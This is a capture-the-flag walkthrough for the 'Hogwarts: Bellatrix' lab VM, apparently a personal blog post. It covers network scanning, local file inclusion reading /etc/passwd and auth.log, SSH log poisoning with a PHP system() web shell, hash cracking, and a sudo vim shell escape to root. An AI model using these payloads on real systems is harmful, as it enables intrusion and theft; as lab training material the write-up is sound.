HOGWARTS: BELLATRIX (walkthrough)

This task is bit different from other,the machine given is a .ova file which is a VMware extension.We will setup the machine using these steps:

1. Import the ‘ova file’ in “Vmware workstation Pro” [Note: Pro version helps in setup the network settings easily using virtual network editor]
2. change the network settings after launching the machine,

>click on edit

> virtual network editor

> change settings(right bottom;will give permissions for changing network settings)

> change VMnet0 to bridge type and external connection to host-only ethernet(i am using virtualbox to perform this challenge so,i add virtualbox host-only)

> click apply and ok

3 Now, setup virtualbox machine network from where we perform all challenge

>click on settings of machine

>go to network section

>check the adapter 1 and adapter 2 box(one for vmware machine access and other for internet connectivity)

>Adapter 1 settings are : attached to → host-only adapter; Name → virtualbox host-only ethernet

>Adapter 2 settings are : attached to → Bridged adapter; Name → intel wifi 6 (in my case, your main internet name may be different)

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —

Let’s begin the challenge from here

Phase 1 (on virtualbox machine)

ifconfig : this shows the machine ip (192.168.56.108 my case eth0)

Firstly,perform netdiscovery scan to get the target (vmware machine) ip address using sudo netdiscover -P -i eth0 -r 192.168.56.0/24

Our target is VMware

check for open ports using network scanner NMAP using command

sudo nmap -A -sS -sV 192.168.56.106

Open ports are 22 ssh | 80 http

Phase 2

Open browser and search for the ip address (my case 192.168.56.106)

Reconnaissance the whole website , check for source code and use inspect element

Information gathered:

“ikilledsiriusblackikilledsiriusblackikilledsiriusblackikilledsiriusblack.php” → last line of the webiste

/*$file = $_GET[‘file’];
if(isset($file)){
include(“$file”);*/

→this is commented in the source code

This shows we have a directory ikilledsiriusblack.php and there is a script which can take input as a file

Searching and reading some other write up’s understand the hints it indicated a LOCAL FILE INCLUSION vulnerability possibly

192.168.56.106/ikilledsiriusblack.php?file=/etc/passwd

this url can be described as

/ikilledsiriusblack.php → directory

?file=/etc/passwd → LFI vuln can be confirmed like this

confirms the LFI vulnerability

Looking each line carefully, got two things

bellatrix:x:1000:1000:Bellatrix,,,:/home/bellatrix:/bin/bash

lestrange:x:1001:1001::/home/lestrange:/bin/rbash

bellatrix user has /bin/bash means everything is allowed & lestrange user has /bin/rbash means it has restricted shell , can’t perform all terminal commands…

After learning more about LOCAL FILE INCLUSION vulnerability , i got to know we can perform log poisoning using two methods:
RCE (apache access) & SSH log

command ?file=/var/log/apache2/access.log , RCE is not possible as it is not allowed

command ?file=/var/log/auth.log , SSH poisoning is successful

Now that we know ssh is possible through is vulnerability and everything is dumped into log file which is accessible , lets try to perform it…

ssh Bellatrix@192.168.56.106 (we dont know password,and it is not needed)

Doing so we notice a new entry in log file,Remember a commented script in the page source… , we have to add a php script to execute whatever we pass to it as a username in ssh.

this php script is ‘<?php system($_GET[‘m’])?>’ (‘ ’ included) i can describe it in detail as

a php code for executing any file we pass in variable ‘m’

> system() is a PHP function that allows the execution of shell commands.

> $_GET[‘m’] code retrieves the value of the query parameter “m” from the URL’s

ssh with script and use the variable to get command line access

further, exploit this vulnerability we can reverse shell to our machine terminal for full access

we know about access to /bin/bash is allowed so i reverse shell to it

Enumerating each directory manually and find some useful information

lestrange:$6$1eIjsdebFF9/rsXH$NajEfDYUP7p/sqHdyOIFwNnltiRPwIU0L14a8zyQIdRUlAomDNrnRjTPN5Y/WirDnwMn698kIA5CV8NLdyGiY0

a hash stored in Swordofgryffindor directory & also .secret.dic file containing wordlist

so at this point i have a hash and a wordlist with users name lets find the value of hash using a tool JOHNTHERIPPER

password:ihateharrypotter

ssh to another user lestrange and password ihateharrypotter. But it is restricted shell (we already know from /bin/rbash).

command sudo -l (to know what users have permissions)

ALL : ALL) NOPASSWD: /usr/bin/vim (means we can use vim commands to execute our commands)

Bypass it using vim /bin/bash

sudo vim -c ‘:!/bin/sh’ (: means command mode of vim , ! means execute external shell command)

gained full shell access , enumerate to bellatrix directory and got flag for user

user: {69e0f71f25ece4351e4d73af430bec43}

But need to get root , so moving further …………

Enumerate to root directory , can show a root.txt file which contains

root{ead5a85a11ba466011fced308d460a76}

AND THATS THE END OF CHALLENGE

THANKYOU for reading till here!

Find me here:https://www.linkedin.com/in/mandeepkumarbanihall/